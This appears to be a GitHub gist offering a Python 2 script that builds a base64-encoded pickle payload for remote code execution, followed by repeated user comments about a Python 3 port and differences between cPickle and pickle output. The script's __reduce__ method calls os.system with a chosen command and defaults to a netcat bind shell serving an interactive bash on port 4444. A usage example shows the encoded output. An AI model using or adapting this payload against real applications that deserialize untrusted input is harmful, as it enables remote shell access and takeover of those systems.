Python's Pickle Remote Code Execution payload template.

pickle-payload.py

#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#

import cPickle
import sys
import base64

DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND

class PickleRce(object):
    def __reduce__(self):
        import os
        return (os.system,(COMMAND,))

print base64.b64encode(cPickle.dumps(PickleRce()))

Usage example:

C:\Users\pickle> python D:\devel\pickle.py "uname -a"
Y250CnN5c3RlbQpwMQooUyd1bmFtZSAtYScKcDIKdFJwMwou

Thanks much =)

Worked like a charm. How would this change in python3 though?

Thank you @mgeeky.

Worked like a charm. How would this change in python3 though?

Hey, @b4d7r1p I've created a python3 script. Maybe you could check it out.

Worked like a charm. How would this change in python3 though?

Change the last print statement to have brackets:
print base64.b64encode(cPickle.dumps(PickleRce())) to print(base64.b64encode(cPickle.dumps(PickleRce())))

Worked like a charm. How would this change in python3 though?

Change the last print statement to have brackets:
print base64.b64encode(cPickle.dumps(PickleRce())) to print(base64.b64encode(cPickle.dumps(PickleRce())))

Yes, @Anon-Exploiter you're correct 👍. I did some digging, the thing is python3 doesn't have a module called cPickle. However, there is a built-in module for python3 called pickle to do the serialization stuff but the output of cPickle.dumps() vs pickle.dumps() differs. I'm not sure why that happens. Does anyone know why? I would love to know. I've also added a sketch below that explains the issue.

Have a nice day guys.

Worked like a charm. How would this change in python3 though?

Change the last print statement to have brackets:
print base64.b64encode(cPickle.dumps(PickleRce())) to print(base64.b64encode(cPickle.dumps(PickleRce())))

Yes, @Anon-Exploiter you're correct 👍. I did some digging, the thing is python3 doesn't have a module called cPickle. However, there is a built-in module for python3 called pickle to do the serialization stuff but the output of cPickle.dumps() vs pickle.dumps() differs. I'm not sure why that happens. Does anyone know why?. I've also added a sketch below that explains the issue.

Have a nice day guys.

Ah, should have tested before saying to just use print() my bad 😛 -- Thanks for correcting.

---

Btw, the end result Is the same for both:

>>> import cPickle
>>>
>>> A = [1,2,3,4,5,6]
>>>
>>> cPickle.dumps(A, protocol=0)
'(lp1\nI1\naI2\naI3\naI4\naI5\naI6\na.'
>>>
>>> cPickle.loads(cPickle.dumps(A, protocol=0))
[1, 2, 3, 4, 5, 6]
>>>
>>>
>>> import pickle
>>>
>>>
>>> pickle.loads( cPickle.dumps(A, protocol=0) )
[1, 2, 3, 4, 5, 6]
>>> pickle.loads( pickle.dumps(A, protocol=0) )
[1, 2, 3, 4, 5, 6]
>>>
>>> pickle.dumps(A, protocol=0)
'(lp0\nI1\naI2\naI3\naI4\naI5\naI6\na.'
>>>
>>>

Found this explanation:
https://stackoverflow.com/a/7501980

No problem @Anon-Exploiter. Thanks for the response 👍. That was a good explanation.

So I believe the conclusion is that "There is no guarantee that seemingly identical objects will produce identical pickle strings.". Which means, even though the pickle strings (serialized data) generated from cPickle.dumps() or pickle.dumps() does not give exact identical results, when deserializing them with loads() we get the same results.

Thank you @Anon-Exploiter for clearing my doubt 💯. Have a nice day.

No problem @Anon-Exploiter. Thanks for the response 👍. That was a good explanation.

So I believe the conclusion is that "There is no guarantee that seemingly identical objects will produce identical pickle strings.". Which means, even though the pickle strings (serialized data) generated from cPickle.dumps() or pickle.dumps() does not give exact identical results, when deserializing them with loads() we get the same results.

Thank you @Anon-Exploiter for clearing my doubt 💯. Have a nice day.

You're welcome! 🐱